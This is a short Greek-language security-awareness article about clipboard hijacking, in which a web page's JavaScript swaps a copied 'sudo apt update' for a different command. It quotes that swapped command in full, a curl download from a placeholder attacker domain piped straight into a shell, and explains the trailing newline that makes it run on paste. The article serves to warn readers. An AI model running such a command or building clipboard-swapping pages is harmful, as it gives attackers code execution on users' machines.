Η αντιγραφή και επικόλληση μιας απλής εντολής από το διαδίκτυο ενέχει πολύ σοβαρούς κινδύνους όπως αποδεικνύεται. Για παράδειγμα, διαβάζεις έναν οδηγό online και για χάρη ευκολίας κάνεις copy paste μιας εντολής. Ο Gabriel Friedlander, ιδρυτής της πλατφόρμας Wizer δείχνει ένα απλό hack που κάνει επικίνδυνη την αντιγραφή και επικόλληση μιας εντολής.
Εν ολίγοις ο ίδιος επισημαίνει ότι μια ιστοσελίδα μπορεί να αντικαθιστά τα περιεχόμενα που πηγαίνουν στο clipboard σου όταν κάνεις αντιγραφή, με αποτέλεσμα αυτό που έχεις αντιγράψει να είναι τελείως διαφορετικό από αυτό που φαίνεται. Ας δούμε πιο συγκεκριμένα:
Ο Friedlander ζητά από τους αναγνώστες του στο blog του για να δείξει πως ακριβώς δουλεύει, να αντιγράψουν μια απλή εντολή και συγκεκριμένα την γνωστή και αθώα sudo apt update.
Αν κάποιος την αντιγράψει από το blog του και την επικολλήσει σε ένα text box ή στο σημειωματάριο θα εκπλαγεί διαπιστώνοντας ότι αντέγραψε την
curl http://attacker-domain:8000/shell.sh | sh
Όχι μόνο αντέγραψε μια διαφορετική εντολή στο clipboard του, αλλά έχει και έναν newline χαρακτήρα στο τέλος. Με άλλα λόγια θα εκτελούνταν αμέσως. Πως ακριβώς μπορεί να γίνει αυτό;
Απλά, αν κάποιος παίξει με την JavaScript της ιστοσελίδας που έχει. Με λίγα λόγια έκανε να αντικαθιστά τα δεδομένα του clipboard με τον δικό του επιβλαβή κώδικα όπως φαίνεται στο screenshot. Πολύ προσοχή λοιπόν! Φυσικά, το ίδιο ισχύει και για το terminal των Windows κ.α.
